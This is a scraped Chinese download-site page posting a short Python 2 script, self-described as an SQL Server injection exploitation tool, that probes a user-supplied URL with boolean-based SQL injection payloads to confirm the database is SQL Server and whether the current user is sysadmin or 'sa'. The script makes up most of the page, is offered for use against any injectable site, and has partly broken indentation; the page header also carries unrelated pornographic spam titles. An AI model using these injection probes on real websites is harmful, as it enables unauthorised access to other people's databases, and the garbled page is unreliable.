日本好好热aⅴ|国产99视频精品免费观看|日本成人aV在线|久热香蕉国产在线

  • 

    <cite id="ikgdy"><table id="ikgdy"></table></cite>
      

    1. 
 

      
	
      
        西西軟件園多重安全檢測(cè)下載網(wǎng)站、值得信賴(lài)的軟件下載站!
        
    
      

      

      
	
      
    	
        
        
      
            
      
            	
      軟件
      
            	
      軟件
      
            	
      文章
      
            
      
            
            搜索
        
      
    
      

      



      

      
  
      
    
      首頁(yè)西西教程數(shù)據(jù)庫(kù)教程 → Python編寫(xiě)數(shù)據(jù)庫(kù)SA用戶檢測(cè)方案
      
    
      
        
      Python編寫(xiě)數(shù)據(jù)庫(kù)SA用戶檢測(cè)方案
      
        
      相關(guān)軟件相關(guān)文章發(fā)表評(píng)論 來(lái)源:本站整理時(shí)間:2011/7/14 15:03:48字體大。A-A+
      
        
      作者:西西點(diǎn)擊:181次評(píng)論:0次標(biāo)簽: Python
      
        
      
              
      
        
          
      
                
      
                    
                    
      《派森》(Python)3.13 win32 英文安裝版
      
                    
        
                        
      • 類(lèi)型:編程工具大小:21M語(yǔ)言:英文 評(píng)分:8.7
        • 
                        
      • 標(biāo)簽:
        • 
                    
      
                    立即下載
                
            
            
      
          
    
      
              
      無(wú)聊的時(shí)候,用Python寫(xiě)的一個(gè)小程序,用有注入點(diǎn)的鏈接,檢測(cè)當(dāng)前數(shù)據(jù)庫(kù)用戶是否為sa,沒(méi)什么技術(shù)含量。
       # Code by zhaoxiaobu Email: little.bu@hotmail.com   
      1. #-*- coding: UTF-8 -*-    
      2. from sys import exit   
      3. from urllib import urlopen   
      4. from string import join,strip   
      5. from re import search   
      6.  
      7.  
      8. def is_sqlable():  
      9.     sql1="%20and%201=2" 
      10.     sql2="%20and%201=1" 
      11.     urlfile1=urlopen(url+sql1)  
      12.     urlfile2=urlopen(url+sql2)  
      13.     htmlcodes1=urlfile1.read()  
      14.     htmlcodes2=urlfile2.read()  
      15.     if not search(judge,htmlcodes1) and search(judge,htmlcodes2):  
      16.     print "[信息]恭喜!這個(gè)URL是有注入漏洞的!\n" 
      17.     print "[信息]現(xiàn)在判斷數(shù)據(jù)庫(kù)是否是SQL Server,請(qǐng)耐心等候....."   
      18.     is_SQLServer()  
      19.     else:  
      20.     print "[錯(cuò)誤]你確定這個(gè)URL能用?換個(gè)別的試試吧!\n" 
      21.  
      22. def is_SQLServer():  
      23.     sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
      24.     urlfile=urlopen(url+sql)  
      25.     htmlcodes=urlfile.read()  
      26.     if not search(judge,htmlcodes):  
      27.     print "[錯(cuò)誤]數(shù)據(jù)庫(kù)好像不是SQL Server的!\n" 
      28.     else:  
      29.     print "[信息]確認(rèn)是SQL Server數(shù)據(jù)庫(kù)!\n" 
      30.     print "[信息]開(kāi)始檢測(cè)當(dāng)前數(shù)據(jù)庫(kù)用戶權(quán)限,請(qǐng)耐心等待......" 
      31.     is_sysadmin()  
      32.  
      33.  
      34. def is_sysadmin():   
      35.     sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
      36.     urlfile = urlopen(url+sql)   
      37.     htmlcodes = urlfile.read()   
      38.     if not search(judge,htmlcodes):   
      39.         print "[錯(cuò)誤]當(dāng)前數(shù)據(jù)庫(kù)用戶不具有sysadmin權(quán)限!\n" 
      40.     else:   
      41.         print "[信息]當(dāng)前數(shù)據(jù)庫(kù)用戶具有sysadmin權(quán)限!\n" 
      42.         print "[信息]檢測(cè)當(dāng)前用戶是不是SA,請(qǐng)耐心等待......" 
      43.         is_sa()   
      44.  
      45. def is_sa():   
      46.     sql = "%20and%20'sa'=(select%20System_user)";  
      47.     urlfile = urlopen(url+sql)   
      48.     htmlcodes = urlfile.read()   
      49.     if not search(judge,htmlcodes):   
      50.         print "[錯(cuò)誤]當(dāng)前數(shù)據(jù)庫(kù)用戶不是SA!\n" 
      51.     else:   
      52.         print "[信息]當(dāng)前數(shù)據(jù)庫(kù)用戶是SA!\n" 
      53.  
      54.       
      55.       
      56.  
      57.  
      58. print "\n########################################################################\n"   
      59. print "                       ^o^SQL Server注入利用工具^(guò)o^          "   
      60. print "                      Email: little.bu@hotmail.com\n"   
      61. print "========================================================================";   
      62. url = raw_input('[信息]請(qǐng)輸入一個(gè)可能有注入漏洞的鏈接!\nURL:')   
      63. if url == '':   
      64.     print "[錯(cuò)誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"   
      65.     exit(1)   
      66.  
      67. judge = raw_input("[信息]請(qǐng)?zhí)峁┮粋(gè)判斷字符串.\n判斷字符串:")   
      68. if judge == '':   
      69.     print "[錯(cuò)誤]判斷字符串不能為空!"   
      70.     exit(1)   
      71.  
      72. is_sqlable()  
      73.  
      74.  
      75.  
      76.  
      77.  
      
              
      
              

        
      
    
      

    
      
        
      
            
        
            
            
        
          
    
        
      
        
        
        相關(guān)文章
        
          
      
        
      
        
        
        相關(guān)評(píng)論
        
        
        閱讀本文后您有什么感想? 已有人給出評(píng)價(jià)!
        
        
        
                
          
                    
        • 8   喜歡喜歡 
          • 
                    
        • 3    頂
          • 
                    
        • 1     難過(guò)難過(guò)
          • 
                    
        • 5    囧
          • 
                    
        • 3    圍觀圍觀
          • 
                     
        • 2    無(wú)聊無(wú)聊
          • 
                  
        
                  
        
        
        
            
            
        
                    

        
  
        
    
        熱門(mén)評(píng)論
        
    
        
      
    
        
  
        
  
  
  
        
    
        最新評(píng)論
        
    
        
      
    
        
  
  
        
  
  
        
    
        
      
        發(fā)表評(píng)論 查看所有評(píng)論(0)
        
      
      
        昵稱(chēng): 
        
        
        
      
        
      
        
      表情: 
       高興
       可
       汗
       我不要
       害羞
       好
       下下下
       送花
       屎
       親親
       
        
      
      
        
      字?jǐn)?shù): 0/500
      (您的評(píng)論需要經(jīng)過(guò)審核才能顯示)